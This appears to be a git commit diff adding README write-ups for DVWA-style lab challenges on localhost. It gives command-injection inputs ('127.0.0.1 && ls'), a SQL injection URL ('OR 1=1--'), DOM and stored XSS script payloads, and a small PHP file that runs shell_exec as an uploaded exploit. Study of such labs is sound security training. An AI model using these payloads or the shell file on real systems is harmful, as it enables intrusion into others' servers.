docs: 📝 Update readme with description of the challenge
This commit is contained in:
parent
ee54d76769
commit
afaae6aad0
@ -1,10 +1,14 @@
|
|||||||
|
# Command Injection
|
||||||
|
The aim of this challenge is to inject a command to the server that execute a script.
|
||||||
# Low
|
# Low
|
||||||
```bash
|
```bash
|
||||||
127.0.0.1 && ls
|
127.0.0.1 && ls
|
||||||
```
|
```
|
||||||
|
|
||||||
# Medium
|
# Medium
|
||||||
> In progress
|
```bash
|
||||||
|
127.0.0.1 & ls
|
||||||
|
```
|
||||||
|
|
||||||
# High
|
# High
|
||||||
> In progress
|
> In progress
|
||||||
|
4
File injection/exploit.php
Normal file
4
File injection/exploit.php
Normal file
@ -0,0 +1,4 @@
|
|||||||
|
<?php
|
||||||
|
$output = shell_exec('ls');
|
||||||
|
echo "<pre>$output</pre>";
|
||||||
|
?>
|
@ -1,3 +1,6 @@
|
|||||||
|
# SQL Injection
|
||||||
|
The aim of this challenge is to inject a SQL command to the server that execute a script.
|
||||||
|
|
||||||
# Low
|
# Low
|
||||||
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
|
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
|
||||||
|
|
||||||
|
@ -1,3 +1,6 @@
|
|||||||
|
# XSS (DOM)
|
||||||
|
The aim of this challenge is to inject a script to the server that execute a script.
|
||||||
|
|
||||||
# Low
|
# Low
|
||||||
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
|
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
|
||||||
|
|
||||||
|
@ -1,3 +1,5 @@
|
|||||||
|
# Stored XSS
|
||||||
|
The aim of this challenge is to inject a script to the server that execute a script.
|
||||||
# Low
|
# Low
|
||||||
```javascript
|
```javascript
|
||||||
<script>alert("XSS");</script>
|
<script>alert("XSS");</script>
|
||||||
|
Loading…
x
Reference in New Issue
Block a user